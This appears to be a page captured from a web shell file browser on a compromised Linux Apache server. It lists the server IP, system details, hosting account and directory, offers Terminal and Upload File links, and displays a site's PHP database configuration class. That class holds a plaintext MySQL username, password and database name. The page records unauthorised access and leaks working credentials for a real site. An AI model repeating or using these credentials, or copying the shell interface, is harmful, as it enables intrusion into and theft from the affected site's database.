Server IP : 164.52.202.56 / Your IP : 216.73.216.231 Web Server : Apache System : Linux e2e-70-56.ssdcloudindia.net 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Tue Nov 5 04:50:16 EST 2024 x86_64 User : rubyaromatics ( 1052) PHP Version : 7.2.34 Directory (0755) : /home/rubyaromatics/public_html/controller/pro/../ |
[ Home ] | [ Terminal ] | [ Upload File ] |
---|
<?php error_reporting(0); class database { protected $conn; protected $result; public $host = 'localhost'; public $username = 'rubyaromatics_users'; public $password = 'aoPWBGw7M6zv'; public $db = 'rubyaromatics_rubyarom_data'; public function __construct() { $this->conn = new mysqli($this->host, $this->username, $this->password, $this->db); if ($this->conn->connect_error) { die("Connection failed: " . $this->conn->connect_error); } } public function disconnect() { $this->conn->close(); } public function query($sql) { $this->result = $this->conn->query($sql); } public function numRows() { return ($this->result) ? $this->result->num_rows : 0; } public function rows() { $rows = array(); if ($this->result) { while ($row = $this->result->fetch_assoc()) { $rows[] = $row; } } return $rows; } public function inserted() { return $this->conn->insert_id; } } ?>